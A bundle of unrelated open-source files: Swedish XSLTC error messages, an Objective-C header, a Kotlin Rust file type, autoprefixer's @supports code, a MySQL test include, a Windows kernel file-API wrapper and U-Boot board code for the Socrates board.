* attribute in a place other than on an element. The substitution text
* specifies the name of the attribute.
*/
{BasisLibrary.STRAY_ATTRIBUTE_ERR,
"Attributet ''{0}'' finns utanf\u00F6r elementet."},
/*
* Note to translators: As with the preceding message, a namespace
* declaration has the form of an attribute and is only permitted to
* appear on an element. The substitution text {0} is the namespace
* prefix and {1} is the URI that was being used in the erroneous
* namespace declaration.
*/
{BasisLibrary.STRAY_NAMESPACE_ERR,
"Namnrymdsdeklarationen ''{0}''=''{1}'' finns utanf\u00F6r element."},
/*
* Note to translators: The stylesheet contained a reference to a
* namespace prefix that was undefined. The value of the substitution
* text is the name of the prefix.
*/
{BasisLibrary.NAMESPACE_PREFIX_ERR,
"Namnrymd f\u00F6r prefix ''{0}'' har inte deklarerats."},
/*
* Note to translators: The following represents an internal error.
* DOMAdapter is a Java class in XSLTC.
*/
{BasisLibrary.DOM_ADAPTER_INIT_ERR,
"DOMAdapter har skapats med fel typ av DOM-k\u00E4lla."},
/*
* Note to translators: The following message indicates that the XML
* parser that is providing input to XSLTC cannot be used because it
* does not describe to XSLTC the structure of the input XML document's
* DTD.
*/
{BasisLibrary.PARSER_DTD_SUPPORT_ERR,
"Den SAX-parser som du anv\u00E4nder hanterar inga DTD-deklarationsh\u00E4ndelser."},
/*
* Note to translators: The following message indicates that the XML
* parser that is providing input to XSLTC cannot be used because it
* does not distinguish between ordinary XML attributes and namespace
* declarations.
*/
{BasisLibrary.NAMESPACES_SUPPORT_ERR,
"Den SAX-parser som du anv\u00E4nder saknar st\u00F6d f\u00F6r XML-namnrymder."},
/*
* Note to translators: The substitution text is the URI that was in
* error.
*/
{BasisLibrary.CANT_RESOLVE_RELATIVE_URI_ERR,
"Kunde inte matcha URI-referensen ''{0}''."},
/*
* Note to translators: The stylesheet contained an element that was
* not recognized as part of the XSL syntax. The substitution text
* gives the element name.
*/
{BasisLibrary.UNSUPPORTED_XSL_ERR,
"XSL-elementet ''{0}'' st\u00F6ds inte"},
/*
* Note to translators: The stylesheet referred to an extension to the
* XSL syntax and indicated that it was defined by XSLTC, but XSLTC does
* not recognize the particular extension named. The substitution text
* gives the extension name.
*/
{BasisLibrary.UNSUPPORTED_EXT_ERR,
"XSLTC-till\u00E4gget ''{0}'' \u00E4r ok\u00E4nt"},
/*
* Note to translators: This error message is produced if the translet
* class was compiled using a newer version of XSLTC and deployed for
* execution with an older version of XSLTC. The substitution text is
* the name of the translet class.
*/
{BasisLibrary.UNKNOWN_TRANSLET_VERSION_ERR,
"Angiven translet, ''{0}'', har skapats med en XSLTC-version som \u00E4r senare \u00E4n den XSLTC-k\u00F6rning i bruk. F\u00F6r att kunna k\u00F6ra denna translet m\u00E5ste du omkompilera formatmallen eller anv\u00E4nda en senare version av XSLTC."},
/*
* Note to translators: An attribute whose effective value is required
* to be a "QName" had a value that was incorrect.
* 'QName' is an XML syntactic term that must not be translated. The
* substitution text contains the actual value of the attribute.
*/
{BasisLibrary.INVALID_QNAME_ERR,
"Ett attribut vars v\u00E4rde m\u00E5ste vara ett QName hade v\u00E4rdet ''{0}''"},
/*
* Note to translators: An attribute whose effective value is required
* to be a "NCName" had a value that was incorrect.
* 'NCName' is an XML syntactic term that must not be translated. The
* substitution text contains the actual value of the attribute.
*/
{BasisLibrary.INVALID_NCNAME_ERR,
"Ett attribut vars v\u00E4rde m\u00E5ste vara ett NCName hade v\u00E4rdet ''{0}''"},
{BasisLibrary.UNALLOWED_EXTENSION_FUNCTION_ERR,
"Anv\u00E4ndning av till\u00E4ggsfunktionen ''{0}'' \u00E4r inte till\u00E5tet n\u00E4r s\u00E4ker bearbetning till\u00E4mpas."},
{BasisLibrary.UNALLOWED_EXTENSION_ELEMENT_ERR,
"Anv\u00E4ndning av till\u00E4ggselementet ''{0}'' \u00E4r inte till\u00E5tet n\u00E4r s\u00E4ker bearbetning till\u00E4mpas."},
};
}
}
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import "NSObject-Protocol.h"
@class NSDraggingSession;
@protocol NSDraggingSource <NSObject>
- (unsigned long long)draggingSession:(NSDraggingSession *)arg1 sourceOperationMaskForDraggingContext:(long long)arg2;
@optional
- (BOOL)ignoreModifierKeysForDraggingSession:(NSDraggingSession *)arg1;
- (void)draggingSession:(NSDraggingSession *)arg1 endedAtPoint:(struct CGPoint)arg2 operation:(unsigned long long)arg3;
- (void)draggingSession:(NSDraggingSession *)arg1 movedToPoint:(struct CGPoint)arg2;
- (void)draggingSession:(NSDraggingSession *)arg1 willBeginAtPoint:(struct CGPoint)arg2;
@end
| {
"pile_set_name": "Github"
} |
/*
* Use of this source code is governed by the MIT license that can be
* found in the LICENSE file.
*/
package org.rust.lang
import com.intellij.openapi.fileTypes.LanguageFileType
import com.intellij.openapi.vfs.VirtualFile
import org.rust.ide.icons.RsIcons
import javax.swing.Icon
object RsFileType : LanguageFileType(RsLanguage) {
override fun getName(): String = "Rust"
override fun getIcon(): Icon = RsIcons.RUST_FILE
override fun getDefaultExtension(): String = "rs"
override fun getCharset(file: VirtualFile, content: ByteArray): String = "UTF-8"
override fun getDescription(): String = "Rust Files"
}
| {
"pile_set_name": "Github"
} |
(function() {
var Browsers, Supports, Value, brackets, browser, data, postcss, ref, support, supported, utils, version, versions;
Browsers = require('./browsers');
brackets = require('./brackets');
Value = require('./value');
utils = require('./utils');
postcss = require('postcss');
supported = [];
data = require('caniuse-db/features-json/css-featurequeries.json');
ref = data.stats;
for (browser in ref) {
versions = ref[browser];
for (version in versions) {
support = versions[version];
if (/y/.test(support)) {
supported.push(browser + ' ' + version);
}
}
}
Supports = (function() {
function Supports(Prefixes, all1) {
this.Prefixes = Prefixes;
this.all = all1;
}
Supports.prototype.prefixer = function() {
var browsers, filtered;
if (this.prefixerCache) {
return this.prefixerCache;
}
filtered = this.all.browsers.selected.filter((function(_this) {
return function(i) {
return supported.indexOf(i) !== -1;
};
})(this));
browsers = new Browsers(this.all.browsers.data, filtered, this.all.options);
return this.prefixerCache = new this.Prefixes(this.all.data, browsers, this.all.options);
};
Supports.prototype.parse = function(str) {
var prop, ref1, value;
ref1 = str.split(':'), prop = ref1[0], value = ref1[1];
value || (value = '');
return [prop.trim(), value.trim()];
};
Supports.prototype.virtual = function(str) {
var prop, ref1, rule, value;
ref1 = this.parse(str), prop = ref1[0], value = ref1[1];
rule = postcss.parse('a{}').first;
rule.append({
prop: prop,
value: value,
raws: {
before: ''
}
});
return rule;
};
Supports.prototype.prefixed = function(str) {
var decl, j, k, len, len1, prefixer, prop, ref1, ref2, rule, value;
rule = this.virtual(str);
prop = rule.first.prop;
prefixer = this.prefixer().add[prop];
if (prefixer != null) {
if (typeof prefixer.process === "function") {
prefixer.process(rule.first);
}
}
ref1 = rule.nodes;
for (j = 0, len = ref1.length; j < len; j++) {
decl = ref1[j];
ref2 = this.prefixer().values('add', prop);
for (k = 0, len1 = ref2.length; k < len1; k++) {
value = ref2[k];
value.process(decl);
}
Value.save(this.all, decl);
}
return rule.nodes;
};
Supports.prototype.isNot = function(node) {
return typeof node === 'string' && /not\s*/i.test(node);
};
Supports.prototype.isOr = function(node) {
return typeof node === 'string' && /\s*or\s*/i.test(node);
};
Supports.prototype.isProp = function(node) {
return typeof node === 'object' && node.length === 1 && typeof node[0] === 'string';
};
Supports.prototype.isHack = function(all, unprefixed) {
var check;
check = new RegExp('(\\(|\\s)' + utils.escapeRegexp(unprefixed) + ':');
return !check.test(all);
};
Supports.prototype.toRemove = function(str, all) {
var checker, j, len, prop, ref1, ref2, ref3, unprefixed, value;
ref1 = this.parse(str), prop = ref1[0], value = ref1[1];
unprefixed = this.all.unprefixed(prop);
if (((ref2 = this.all.cleaner().remove[prop]) != null ? ref2.remove : void 0) && !this.isHack(all, unprefixed)) {
return true;
}
ref3 = this.all.cleaner().values('remove', unprefixed);
for (j = 0, len = ref3.length; j < len; j++) {
checker = ref3[j];
if (checker.check(value)) {
return true;
}
}
return false;
};
Supports.prototype.remove = function(nodes, all) {
var i;
i = 0;
while (i < nodes.length) {
if (!this.isNot(nodes[i - 1]) && this.isProp(nodes[i]) && this.isOr(nodes[i + 1])) {
if (this.toRemove(nodes[i][0], all)) {
nodes.splice(i, 2);
} else {
i += 2;
}
} else {
if (typeof nodes[i] === 'object') {
nodes[i] = this.remove(nodes[i], all);
}
i += 1;
}
}
return nodes;
};
Supports.prototype.cleanBrackets = function(nodes) {
return nodes.map((function(_this) {
return function(i) {
if (typeof i === 'object') {
if (i.length === 1 && typeof i[0] === 'object') {
return _this.cleanBrackets(i[0]);
} else {
return _this.cleanBrackets(i);
}
} else {
return i;
}
};
})(this));
};
Supports.prototype.convert = function(progress) {
var i, j, len, result;
result = [''];
for (j = 0, len = progress.length; j < len; j++) {
i = progress[j];
result.push([i.prop + ": " + i.value]);
result.push(' or ');
}
result[result.length - 1] = '';
return result;
};
Supports.prototype.normalize = function(nodes) {
if (typeof nodes === 'object') {
nodes = nodes.filter(function(i) {
return i !== '';
});
if (typeof nodes[0] === 'string' && nodes[0].indexOf(':') !== -1) {
return [brackets.stringify(nodes)];
} else {
return nodes.map((function(_this) {
return function(i) {
return _this.normalize(i);
};
})(this));
}
} else {
return nodes;
}
};
Supports.prototype.add = function(nodes, all) {
return nodes.map((function(_this) {
return function(i) {
var prefixed;
if (_this.isProp(i)) {
prefixed = _this.prefixed(i[0]);
if (prefixed.length > 1) {
return _this.convert(prefixed);
} else {
return i;
}
} else if (typeof i === 'object') {
return _this.add(i, all);
} else {
return i;
}
};
})(this));
};
Supports.prototype.process = function(rule) {
var ast;
ast = brackets.parse(rule.params);
ast = this.normalize(ast);
ast = this.remove(ast, rule.params);
ast = this.add(ast, rule.params);
ast = this.cleanBrackets(ast);
return rule.params = brackets.stringify(ast);
};
return Supports;
})();
module.exports = Supports;
}).call(this);
| {
"pile_set_name": "Github"
} |
#
# CHAR column types
#
--source have_engine.inc
--source type_char.inc
--source cleanup_engine.inc
| {
"pile_set_name": "Github"
} |
#include <fltKernel.h>
#include "FilesAPI.h"
FilesAPI::FilesAPI(
LPCWSTR FilePath,
CREATE_FILE_TYPE Type,
ACCESS_MASK AccessMask,
ULONG ShareAccess
) : hFile(NULL) {
UNICODE_STRING Path;
RtlInitUnicodeString(&Path, FilePath);
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(
&ObjectAttributes,
&Path,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);
IO_STATUS_BLOCK IoStatusBlock = {};
LARGE_INTEGER AllocationSize = {};
ULONG CreateDisposition = FILE_OVERWRITE;
switch (Type) {
case fCreateEmpty:
CreateDisposition = FILE_OVERWRITE_IF;
break;
case fOpenExisting:
CreateDisposition = FILE_OPEN;
break;
case fOpenOrCreate:
CreateDisposition = FILE_OPEN_IF;
break;
}
CreationStatus = ZwCreateFile(
&hFile,
AccessMask,
&ObjectAttributes,
&IoStatusBlock,
&AllocationSize,
FILE_ATTRIBUTE_NORMAL,
ShareAccess,
CreateDisposition,
FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0
);
}
NTSTATUS FilesAPI::Read(OUT PVOID Buffer, ULONG Size, OPTIONAL UINT64 Offset) const {
IO_STATUS_BLOCK IoStatusBlock = {};
return ZwReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Buffer, Size, reinterpret_cast<PLARGE_INTEGER>(&Offset), NULL);
}
NTSTATUS FilesAPI::Write(IN PVOID Buffer, ULONG Size, OPTIONAL UINT64 Offset) const {
IO_STATUS_BLOCK IoStatusBlock = {};
return ZwWriteFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Buffer, Size, reinterpret_cast<PLARGE_INTEGER>(&Offset), NULL);
}
NTSTATUS FilesAPI::Close() {
NTSTATUS Status = hFile ? ZwClose(hFile) : STATUS_SUCCESS;
hFile = NULL;
return Status;
}
NTSTATUS FilesAPI::CreateDir(LPCWSTR DirPath) {
UNICODE_STRING Path;
RtlInitUnicodeString(&Path, DirPath);
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(
&ObjectAttributes,
&Path,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);
IO_STATUS_BLOCK IoStatusBlock = {};
LARGE_INTEGER AllocationSize = {};
HANDLE hDir = NULL;
NTSTATUS Status = ZwCreateFile(
&hDir,
SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
&AllocationSize,
FILE_ATTRIBUTE_NORMAL,
0, // Non-shared access
FILE_CREATE,
FILE_DIRECTORY_FILE,
NULL,
0
);
if (NT_SUCCESS(Status) && hDir) ZwClose(hDir);
return Status;
}
NTSTATUS FilesAPI::DeleteFile(LPCWSTR FilePath) {
UNICODE_STRING Path;
RtlInitUnicodeString(&Path, FilePath);
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(
&ObjectAttributes,
&Path,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
return ZwDeleteFile(&ObjectAttributes);
} | {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* (C) Copyright 2008
* Sergei Poselenov, Emcraft Systems, [email protected].
*
* Copyright 2004 Freescale Semiconductor.
* (C) Copyright 2002,2003, Motorola Inc.
* Xianghua Xiao, ([email protected])
*
* (C) Copyright 2002 Scott McNutt <[email protected]>
*/
#include <common.h>
#include <pci.h>
#include <asm/processor.h>
#include <asm/immap_85xx.h>
#include <ioports.h>
#include <flash.h>
#include <linux/libfdt.h>
#include <fdt_support.h>
#include <asm/io.h>
#include <i2c.h>
#include <mb862xx.h>
#include <video_fb.h>
#include "upm_table.h"
DECLARE_GLOBAL_DATA_PTR;
extern flash_info_t flash_info[]; /* FLASH chips info */
extern GraphicDevice mb862xx;
void local_bus_init (void);
ulong flash_get_size (ulong base, int banknum);
int checkboard (void)
{
volatile ccsr_gur_t *gur = (void *)(CONFIG_SYS_MPC85xx_GUTS_ADDR);
char buf[64];
int f;
int i = env_get_f("serial#", buf, sizeof(buf));
#ifdef CONFIG_PCI
char *src;
#endif
puts("Board: Socrates");
if (i > 0) {
puts(", serial# ");
puts(buf);
}
putc('\n');
#ifdef CONFIG_PCI
/* Check the PCI_clk sel bit */
if (in_be32(&gur->porpllsr) & (1<<15)) {
src = "SYSCLK";
f = CONFIG_SYS_CLK_FREQ;
} else {
src = "PCI_CLK";
f = CONFIG_PCI_CLK_FREQ;
}
printf ("PCI1: 32 bit, %d MHz (%s)\n", f/1000000, src);
#else
printf ("PCI1: disabled\n");
#endif
/*
* Initialize local bus.
*/
local_bus_init ();
return 0;
}
int misc_init_r (void)
{
/*
* Adjust flash start and offset to detected values
*/
gd->bd->bi_flashstart = 0 - gd->bd->bi_flashsize;
gd->bd->bi_flashoffset = 0;
/*
* Check if boot FLASH isn't max size
*/
if (gd->bd->bi_flashsize < (0 - CONFIG_SYS_FLASH0)) {
set_lbc_or(0, gd->bd->bi_flashstart |
(CONFIG_SYS_OR0_PRELIM & 0x00007fff));
set_lbc_br(0, gd->bd->bi_flashstart |
(CONFIG_SYS_BR0_PRELIM & 0x00007fff));
/*
* Re-check to get correct base address
*/
flash_get_size(gd->bd->bi_flashstart, CONFIG_SYS_MAX_FLASH_BANKS - 1);
}
/*
* Check if only one FLASH bank is available
*/
if (gd->bd->bi_flashsize != CONFIG_SYS_MAX_FLASH_BANKS * (0 - CONFIG_SYS_FLASH0)) {
set_lbc_or(1, 0);
set_lbc_br(1, 0);
/*
* Re-do flash protection upon new addresses
*/
flash_protect (FLAG_PROTECT_CLEAR,
gd->bd->bi_flashstart, 0xffffffff,
&flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);
/* Monitor protection ON by default */
flash_protect (FLAG_PROTECT_SET,
CONFIG_SYS_MONITOR_BASE, CONFIG_SYS_MONITOR_BASE + monitor_flash_len - 1,
&flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);
/* Environment protection ON by default */
flash_protect (FLAG_PROTECT_SET,
CONFIG_ENV_ADDR,
CONFIG_ENV_ADDR + CONFIG_ENV_SECT_SIZE - 1,
&flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);
/* Redundant environment protection ON by default */
flash_protect (FLAG_PROTECT_SET,
CONFIG_ENV_ADDR_REDUND,
CONFIG_ENV_ADDR_REDUND + CONFIG_ENV_SECT_SIZE - 1,
&flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);
}
return 0;
}
/*
* Initialize Local Bus
*/
void local_bus_init (void)
{
volatile fsl_lbc_t *lbc = LBC_BASE_ADDR;
volatile ccsr_local_ecm_t *ecm = (void *)(CONFIG_SYS_MPC85xx_ECM_ADDR);
sys_info_t sysinfo;
uint clkdiv;
uint lbc_mhz;
uint lcrr = CONFIG_SYS_LBC_LCRR;
get_sys_info (&sysinfo);
clkdiv = lbc->lcrr & LCRR_CLKDIV;
lbc_mhz = sysinfo.freq_systembus / 1000000 / clkdiv;
/* Disable PLL bypass for Local Bus Clock >= 66 MHz */
if (lbc_mhz >= 66)
lcrr &= ~LCRR_DBYP; /* DLL Enabled */
else
lcrr |= LCRR_DBYP; /* DLL Bypass */
out_be32 (&lbc->lcrr, lcrr);
asm ("sync;isync;msync");
out_be32 (&lbc->ltesr, 0xffffffff); /* Clear LBC error interrupts */
out_be32 (&lbc->lteir, 0xffffffff); /* Enable LBC error interrupts */
out_be32 (&ecm->eedr, 0xffffffff); /* Clear ecm errors */
out_be32 (&ecm->eeer, 0xffffffff); /* Enable ecm errors */
/* Init UPMA for FPGA access */
out_be32 (&lbc->mamr, 0x44440); /* Use a customer-supplied value */
upmconfig (UPMA, (uint *)UPMTableA, sizeof(UPMTableA)/sizeof(int));
/* Init UPMB for Lime controller access */
out_be32 (&lbc->mbmr, 0x444440); /* Use a customer-supplied value */
upmconfig (UPMB, (uint *)UPMTableB, sizeof(UPMTableB)/sizeof(int));
}
#if defined(CONFIG_PCI)
/*
* Initialize PCI Devices, report devices found.
*/
#ifndef CONFIG_PCI_PNP
static struct pci_config_table pci_mpc85xxads_config_table[] = {
{PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
PCI_IDSEL_NUMBER, PCI_ANY_ID,
pci_cfgfunc_config_device, {PCI_ENET0_IOADDR,
PCI_ENET0_MEMADDR,
PCI_COMMAND_MEMORY |
PCI_COMMAND_MASTER}},
{}
};
#endif
static struct pci_controller hose = {
#ifndef CONFIG_PCI_PNP
config_table:pci_mpc85xxads_config_table,
#endif
};
#endif /* CONFIG_PCI */
void pci_init_board (void)
{
#ifdef CONFIG_PCI
pci_mpc85xx_init (&hose);
#endif /* CONFIG_PCI */
}
#ifdef CONFIG_BOARD_EARLY_INIT_R
int board_early_init_r (void)
{
volatile ccsr_gur_t *gur = (void *)(CONFIG_SYS_MPC85xx_GUTS_ADDR);
/* set and reset the GPIO pin 2 which will reset the W83782G chip */
out_8((unsigned char*)&gur->gpoutdr, 0x3F );
out_be32((unsigned int*)&gur->gpiocr, 0x200 ); /* enable GPOut */
udelay(200);
out_8( (unsigned char*)&gur->gpoutdr, 0x1F );
return (0);
}
#endif /* CONFIG_BOARD_EARLY_INIT_R */
#ifdef CONFIG_OF_BOARD_SETUP
int ft_board_setup(void *blob, bd_t *bd)
{
u32 val[12];
int rc, i = 0;
ft_cpu_setup(blob, bd);
/* Fixup NOR FLASH mapping */
val[i++] = 0; /* chip select number */
val[i++] = 0; /* always 0 */
val[i++] = gd->bd->bi_flashstart;
val[i++] = gd->bd->bi_flashsize;
if (mb862xx.frameAdrs == CONFIG_SYS_LIME_BASE) {
/* Fixup LIME mapping */
val[i++] = 2; /* chip select number */
val[i++] = 0; /* always 0 */
val[i++] = CONFIG_SYS_LIME_BASE;
val[i++] = CONFIG_SYS_LIME_SIZE;
}
/* Fixup FPGA mapping */
val[i++] = 3; /* chip select number */
val[i++] = 0; /* always 0 */
val[i++] = CONFIG_SYS_FPGA_BASE;
val[i++] = CONFIG_SYS_FPGA_SIZE;
rc = fdt_find_and_setprop(blob, "/localbus", "ranges",
val, i * sizeof(u32), 1);
if (rc)
printf("Unable to update localbus ranges, err=%s\n",
fdt_strerror(rc));
return 0;
}
#endif /* CONFIG_OF_BOARD_SETUP */
#define DEFAULT_BRIGHTNESS 25
#define BACKLIGHT_ENABLE (1 << 31)
static const gdc_regs init_regs [] =
{
{0x0100, 0x00010f00},
{0x0020, 0x801901df},
{0x0024, 0x00000000},
{0x0028, 0x00000000},
{0x002c, 0x00000000},
{0x0110, 0x00000000},
{0x0114, 0x00000000},
{0x0118, 0x01df0320},
{0x0004, 0x041f0000},
{0x0008, 0x031f031f},
{0x000c, 0x017f0349},
{0x0010, 0x020c0000},
{0x0014, 0x01df01e9},
{0x0018, 0x00000000},
{0x001c, 0x01e00320},
{0x0100, 0x80010f00},
{0x0, 0x0}
};
const gdc_regs *board_get_regs (void)
{
return init_regs;
}
int lime_probe(void)
{
uint cfg_br2;
uint cfg_or2;
int type;
cfg_br2 = get_lbc_br(2);
cfg_or2 = get_lbc_or(2);
/* Configure GPCM for CS2 */
set_lbc_br(2, 0);
set_lbc_or(2, 0xfc000410);
set_lbc_br(2, (CONFIG_SYS_LIME_BASE) | 0x00001901);
/* Get controller type */
type = mb862xx_probe(CONFIG_SYS_LIME_BASE);
/* Restore previous CS2 configuration */
set_lbc_br(2, 0);
set_lbc_or(2, cfg_or2);
set_lbc_br(2, cfg_br2);
return (type == MB862XX_TYPE_LIME) ? 1 : 0;
}
/* Returns Lime base address */
unsigned int board_video_init (void)
{
if (!lime_probe())
return 0;
mb862xx.winSizeX = 800;
mb862xx.winSizeY = 480;
mb862xx.gdfIndex = GDF_15BIT_555RGB;
mb862xx.gdfBytesPP = 2;
return CONFIG_SYS_LIME_BASE;
}
#define W83782D_REG_CFG 0x40
#define W83782D_REG_BANK_SEL 0x4e
#define W83782D_REG_ADCCLK 0x4b
#define W83782D_REG_BEEP_CTRL 0x4d
#define W83782D_REG_BEEP_CTRL2 0x57
#define W83782D_REG_PWMOUT1 0x5b
#define W83782D_REG_VBAT 0x5d
static int w83782d_hwmon_init(void)
{
u8 buf;
if (i2c_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG, 1, &buf, 1))
return -1;
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG, 0x80);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BANK_SEL, 0);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_ADCCLK, 0x40);
buf = i2c_reg_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL,
buf | 0x80);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL2, 0);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_PWMOUT1, 0x47);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_VBAT, 0x01);
buf = i2c_reg_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG);
i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG,
(buf & 0xf4) | 0x01);
return 0;
}
static void board_backlight_brightness(int br)
{
u32 reg;
u8 buf;
u8 old_buf;
/* Select bank 0 */
if (i2c_read(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &old_buf, 1))
goto err;
else
buf = old_buf & 0xf8;
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &buf, 1))
goto err;
if (br > 0) {
/* PWMOUT1 duty cycle ctrl */
buf = 255 / (100 / br);
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x5b, 1, &buf, 1))
goto err;
/* LEDs on */
reg = in_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c));
if (!(reg & BACKLIGHT_ENABLE))
out_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c),
reg | BACKLIGHT_ENABLE);
} else {
buf = 0;
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x5b, 1, &buf, 1))
goto err;
/* LEDs off */
reg = in_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c));
reg &= ~BACKLIGHT_ENABLE;
out_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c), reg);
}
/* Restore previous bank setting */
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &old_buf, 1))
goto err;
return;
err:
printf("W83782G I2C access failed\n");
}
void board_backlight_switch (int flag)
{
char * param;
int rc;
if (w83782d_hwmon_init())
printf ("hwmon IC init failed\n");
if (flag) {
param = env_get("brightness");
rc = param ? simple_strtol(param, NULL, 10) : -1;
if (rc < 0)
rc = DEFAULT_BRIGHTNESS;
} else {
rc = 0;
}
board_backlight_brightness(rc);
}
#if defined(CONFIG_CONSOLE_EXTRA_INFO)
/*
* Return text to be printed besides the logo.
*/
void video_get_info_str (int line_number, char *info)
{
if (line_number == 1) {
strcpy (info, " Board: Socrates");
} else {
info [0] = '\0';
}
}
#endif
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.